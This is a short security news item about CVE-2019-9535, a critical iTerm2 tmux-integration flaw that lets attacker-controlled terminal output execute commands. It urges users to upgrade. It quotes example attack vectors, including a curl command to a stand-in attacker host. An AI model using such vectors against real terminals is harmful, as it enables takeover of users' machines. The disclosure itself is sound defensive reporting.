Security News > 2019 > October > Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!
2019-10-10 08:47

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More → The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.


News URL

http://feedproxy.google.com/~r/HelpNetSecurity/~3/_T6q5Y322YI/

Related news

Related Vulnerability

DATE CVE VULNERABILITY TITLE RISK
2019-10-09 CVE-2019-9535 Injection vulnerability in Iterm2
A vulnerability exists in the way that iTerm2 integrates with tmux's control mode, which may allow an attacker to execute arbitrary commands by providing malicious output to the terminal.
network
low complexity
iterm2 CWE-74
critical
 9.8
9.8